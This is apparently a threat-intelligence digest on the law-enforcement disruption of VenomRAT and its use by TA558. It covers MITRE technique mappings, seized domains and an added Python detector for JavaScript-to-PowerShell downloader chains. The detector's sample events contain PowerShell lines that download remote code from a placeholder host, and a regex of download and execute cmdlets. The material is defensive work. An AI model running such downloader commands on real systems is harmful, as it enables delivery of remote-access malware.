VenomRAT, a Quasar RAT derivative used by multiple cybercriminal actors, most notably TA558, was disrupted by U.S. and international law enforcement on 13 November 2025, with the seizure of distribution and licensing domains and the arrest of the suspected creator in Greece. Proofpoint observed rising VenomRAT usage in email campaigns from mid-2024 into 2025, and following the takedown actors like TA558 have pivoted to other RATs such as Remcos and XWorm. #VenomRAT #TA558
Key points
- VenomRAT is a commodity RAT based on the open-source Quasar RAT and has been observed in Proofpoint data since 2022.
- On 13 November 2025, international law enforcement disrupted VenomRAT infrastructure (remotesystem[.]in, venomlicense[.]com) and arrested the suspected creator in Greece as part of Operation Endgame.
- TA558 is the most prominent distributor of VenomRAT, accounting for 58% of VenomRAT activity in Proofpoint email campaign data since 2022 and targeting Portuguese- and Spanish-speaking victims.
- Typical campaigns use lures in Portuguese, Spanish, or English with URLs to JavaScript files that spawn PowerShell to download and run VenomRAT; TA2541 and multiple unattributed clusters also used similar delivery chains.
- VenomRAT enables information gathering, exfiltration, lateral movement, and delivery of follow-on payloads; some variants include ransomware functionality.
- Proofpoint has not observed VenomRAT in campaigns since September 2025; disrupted actors have pivoted to other payloads like Remcos RAT and XWorm, and activity volumes have declined.
- Operation Endgame disruptions have materially reduced email-delivered malware activity tied to targeted families and influenced threat actor behavior beyond technical impacts.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – VenomRAT campaigns used JavaScript files that, when executed, spawned PowerShell (“…the file spawned PowerShell to download and run VenomRAT…”)
- [T1105] Ingress Tool Transfer – Attack chain downloads VenomRAT via URLs linked from email lures (“…messages contained URLs leading to a JavaScript file. If executed, the file spawned PowerShell to download and run VenomRAT.”)
- [T1041] Exfiltration Over C2 Channel – VenomRAT is used for information gathering and exfiltration (“VenomRAT can be used for information gathering, exfiltration, lateral movement, and to download follow-on payloads.”)
- [T1021] Remote Services (Lateral Movement) – VenomRAT facilitates lateral movement within compromised environments (“VenomRAT can be used for information gathering, exfiltration, lateral movement…”)
- [T1490] Inhibit System Recovery / [T1486] Data Encrypted for Impact (ransomware) – Some VenomRAT variants contain ransomware functionality (“…Some VenomRAT variants contain ransomware functionality.”)
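As an added defensive example (not Proofpoint's code, nor anything from the VenomRAT operators), the following check covers the delivery chain named in the key points and in the T1059/T1105 entries above: a Windows script host (wscript.exe or cscript.exe, which runs the JavaScript file) spawning PowerShell whose command line, after decoding any -EncodedCommand payload, carries a download or execute cmdlet. The process events and the domain example.invalid are constructed for illustration.

```python
import base64
import re
from dataclasses import dataclass

# Download/execute cmdlets and aliases typical of a PowerShell downloader stage (illustrative, not exhaustive).
DOWNLOAD_PATTERNS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"invoke-expression|\biex\b|start-bitstransfer)", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}      # hosts that execute a .js lure
POWERSHELL = {"powershell.exe", "pwsh.exe"}

@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon EID 1 / Windows 4688 style)."""
    parent_image: str
    image: str
    command_line: str

def decode_encoded_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so patterns can match inside it."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} [decoded: {decoded}]"

def is_js_to_powershell_downloader(ev: ProcEvent) -> bool:
    """True when a script host spawns PowerShell with a download/execute cmdlet in its command line."""
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    child = ev.image.rsplit("\\", 1)[-1].lower()
    if parent not in SCRIPT_HOSTS or child not in POWERSHELL:
        return False
    return bool(DOWNLOAD_PATTERNS.search(decode_encoded_command(ev.command_line)))

def flag_events(events):
    return [ev for ev in events if is_js_to_powershell_downloader(ev)]

# Constructed sample events; the encoded payload is built here rather than hand-typed.
_ENC = base64.b64encode("iwr http://example.invalid/p -OutFile a.dat".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -nop -enc {_ENC}"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c Get-Process"),            # interactive use, not a script-host child
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c Get-Date"),               # script host child, but no download stage
]

if __name__ == "__main__":
    for ev in flag_events(SAMPLE_EVENTS):
        print("ALERT:", decode_encoded_command(ev.command_line))
```

In production the same logic belongs in the SIEM as a parent/child process rule; the base64 decoding is what keeps the encoded variant from slipping past a plain command-line string match.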
Indicators of Compromise
- [Domain] Distribution and licensing domains seized – remotesystem[.]in, venomlicense[.]com
- [File/Artifact] Delivery chain artifacts – JavaScript files that spawn PowerShell to download VenomRAT (JavaScript downloader URLs were observed in TA558 campaigns)
- [Threat Actor] Actor identifiers and targeting context – TA558 (targets Portuguese/Spanish speakers, Latin America/Western Europe/North America), TA2541 (impersonates aviation firms)
- [Temporal] Campaign timing context – VenomRAT observed in Proofpoint email campaigns through September 2025; disruption announced 13 November 2025
Read more: https://www.proofpoint.com/us/blog/threat-insight/security-brief-venomrat-defanged